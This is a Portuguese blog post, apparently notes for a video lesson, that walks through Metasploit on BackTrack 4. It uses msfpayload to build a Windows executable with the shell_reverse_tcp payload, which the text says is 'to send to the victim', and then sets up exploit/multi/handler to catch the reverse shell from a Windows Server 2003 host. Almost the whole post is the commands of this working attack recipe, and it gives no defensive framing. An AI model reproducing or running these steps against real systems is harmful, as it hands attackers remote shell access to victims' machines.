skip to main |
skip to sidebar
Exploit handler+reverse_tcp
Bem Vindos, nesta vídeo aula vamos utilizar o MetaSploit FrameWork3. Vamos usar o exploit handler e a payload shell_reverse_tcp, primeiro vamos configurar e criar o nosso executável com a payload shell_reverse_tcp, depois vamos configurar o exploit handler com a payload shell_reverse_tcp para ficar a escuta das ligações da vitima.
PAYLOAD= windows/shell_reverse_tcp
EXPLOIT= exploit/multi/handler
localhost= 192.168.1.4
remotehost= 192.168.1.2
SO local = Backtrack4
SO remoto = Windows server 2003 SP1
//Usar a payload shell_reverse_tcp;
#./msfpayload windows/shell_reverse_tcp O
//Configurar a payload com o host local e a porta;
#./msfpayload windows/shell_reverse_tcp LHOST=192.168.1.4 LPORT=333 O
//Criar arquivo executável, a enviar para a vitima;
#./msfpayload windows/shell_reverse_tcp LHOST=192.168.1.4 LPORT=333 X > /tmp/MrTcp.exe
//Verificar o Arquivo criado;
#file /tmp/MrTcp.exe
//Abrir o framework;
#./msfconsole
//Usar o exploit hander;
#use exploit/multi/handler
//Mostrar as opções do handler;
#show options
//Adicionar payload reverse_tcp ao exploit;
#set payload windows/shell/reverse_tcp
//Mostrar opções da payload;
#show options
//Definir o host local para ficar a espera de ligaçoes;
#set LHOST 192.168.1.4
//Definir a porta local para ficar a espera de ligações;
#set LPORT 333
//Executar exploit
#exploit
0 comentários:
Enviar um comentário